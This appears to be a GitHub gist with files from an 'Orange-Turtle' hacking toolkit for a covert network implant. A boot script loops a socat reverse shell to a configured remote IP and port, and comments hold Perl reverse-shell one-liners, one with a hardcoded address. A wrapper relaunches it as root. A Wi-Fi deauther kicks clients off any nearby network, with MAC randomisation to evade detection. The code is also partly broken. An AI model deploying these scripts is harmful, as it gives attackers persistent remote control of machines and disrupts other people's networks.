# port from the settings file.
# this file need to be run on boot!
#first check if the function is enabled:
# validate file
start = False
if os.path.isdir('/root/orange_turtle_data') is False:
os.system("mkdir /root/orange_turtle_data")
if os.path.isfile('/root/orange_turtle_data/remote_connection_enabled.txt') is False:
print("remote_connection_enabled.txt doesnt exist.. creating it with disable settings.")
remote_connection_file = open('/root/orange_turtle_data/remote_connection_enabled.txt', 'w')
remote_connection_file.write('0')
remote_connection_file.close()
print("Done")
time.sleep(1)
config_file = open('/root/orange_turtle_data/remote_connection_enabled.txt', 'r')
remote_connection_enabled = str(config_file.read())
if '1' in remote_connection_enabled:
if os.path.isfile('/root/orange_turtle_data/remote_computer_info.txt') is True:
remote_computer_info_file = open('/root/orange_turtle_data/remote_computer_info.txt', 'r')
remote_computer_info = str(remote_computer_info_file.read())
remote_computer_info_lines = remote_computer_info.splitlines()
if len(remote_computer_info_lines) is 2:
# the file is ok
remote_ip = remote_computer_info_lines[0].replace('ip=', '')
remote_port = remote_computer_info_lines[1].replace('port=', '')
start = True
else:
print("Error with remote_computer_info - less then 2 lines- Did you set the IP and port correctly?")
start = False
print("Not starting!")
else:
print("remote_computer_info.txt not found...Set this file with Network-Sniffer")
start = False
elif '0' in remote_connection_enabled:
start = False
if start:
# os.system("chmod +x /root/reverse_shell_payload.py")
check_connection_for_reboot_counter = 0
max_error = 10
check_connection_for_reboot_flag = False
counter = 0
while True:
print("Trying to connect to remote computer...")
print("ip = " + str(remote_ip))
print("port = " + str(remote_port))
try:
os.system("socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:" + str(remote_ip) + ":" + str(remote_port))
except Exception as e:
print("type error: " + str(e))
# os.system("perl -e 'use Socket;$i="10.0.0.32";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'")
# os.system("perl -e 'use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(" + str(remote_port) + ",inet_aton(\"" + str(remote_ip) + "\")))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/bash -i\");};'")
# os.system("python /root/orange_turtle/reverse_shell_payload.py " + str(remote_ip) + " " + str(remote_port))
print("Trying to ping 8.8.8.8")
try:
socket.inet_aton("8.8.8.8")
# valid
conter = 0
check_connection_for_reboot_flag = False
check_connection_for_reboot_counter = 0
print("google responded reseting counters")
except socket.error:
# Not legal
counter = counter + 1
print("Google doesnt answer, counter = " + str(counter))
if check_connection_for_reboot_flag:
print("Max_errors reached max value, check_connection_for_reboot_counter = " +
str(check_connection_for_reboot_counter) + "/3")
check_connection_for_reboot_counter = check_connection_for_reboot_counter + 1
if check_connection_for_reboot_counter > 3:
os.system("reboot")
if counter > max_error:
os.system("service network-manager restart")
counter = 0
check_connection_for_reboot_flag = True
check_connection_for_reboot_counter = 0
time.sleep(20)
Raw
run_rev_shell.sh
#!/bin/sh
while true
do
su - root -c 'python3 /etc/init.d/reverse_shell.py'
done
Raw
settings.py
import os
import time
import cow_say_function
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def settings_menu():
while True:
os.system("clear")
os.system("figlet 'Settings'")
print("Basic settings for your Orange-Turtle")
cow_say_function.draw_line()
print("1. Cow messages display duration" + bcolors.OKGREEN + " - Under development" + bcolors.ENDC)
print("2. Start turtle on boot" + bcolors.OKGREEN + " - Under development" + bcolors.ENDC)
print("4. Change MAC address on boot (random MAC address)"+ bcolors.OKGREEN + " - Under development" + bcolors.ENDC)
print("5. Back to main menu")
user_option = input('Please choose one of the above \n')
if user_option is '1':
print("For how long do you want the messages to appear?")
user_input("Type number in secondes - it DOESNT have to be full number (1.2, 1.5 etc..)\n")
cow_say_duration_file = open('/root/orange_turtle_data/cowsay_duration.txt', 'w')
cow_say_duration_file.write(user_input)
cow_say_duration_file.close()
elif user_option is '5':
return
Raw
wifi_deauther.py
import os
import time
import cow_say_function
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def check_installation():
try:
os.system("airodump-ng")
os.system("aireplay-ng")
except FileNotFoundError:
print("Installll")
#install both
# sudo apt-cache airodumb-ng
# sudo apt-cache aireplay-ng
def wifi_deauther_start(interface_for_wlan):
while True:
os.system("clear")
print("Aireplay-ng")
print("This attack can help you with clients deauthentication from there WiFi network")
print("In other words, you can kick any device that connected to a wireless network that the lan turtle can find!")
print("I highly advise to change the MAC address of your wifi adapter beacuse its visible by the router you attack")
print("WARNING- if you connect to a network via WiFi you will lose your "
"connection(you will have to reset the turtle manually)!!")
cow_say_function.draw_line()
print("1. Change my WiFi interface MAC address to random MAC address(recommended)")
print("2. Show WiFi networks around me")
print("3. Start the deauthentication process(you need to copy a BSSID from step 2 first!)")
print("4. Back to main menu")
user_input = input('Please choose one of the above \n')
if user_input is '1':
print("Setting WiFi adapter DOWN")
os.system("ifconfig " + interface_for_wlan + " down")
print("Im changing your WiFi network card to random MAC address...")
os.system("macchanger -r -i " + interface_for_wlan)
pass
elif user_input is '2':
check_installation()
print("Setting WiFi adapter DOWN")
os.system("ifconfig " + interface_for_wlan + " down")
print("Find the desired network in the list and copy the BSSID! press Ctrl + C to stop")
time.sleep(3)
os.system("airodump-ng " + interface_for_wlan)
pass
elif user_input is '3':
check_installation()
os.system("ifconfig " + interface_for_wlan + " down")
user_input2 = str(input("Please enter the BSSID/MAC address of the "
"Router(from option 2 on the menu)\n"))
print("The attack is starting... press Ctrl + C to stop")
time.sleep(3)
os.system("aireplay-ng -a " + user_input2 + " --deauth 0 " + interface_for_wlan)
elif user_input is '4':
print("Setting WiFi adapter UP")
os.system("ifconfig " + interface_for_wlan + " up")
else:
cow_say_function.cow_say("This is not a option!\nTry again")
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment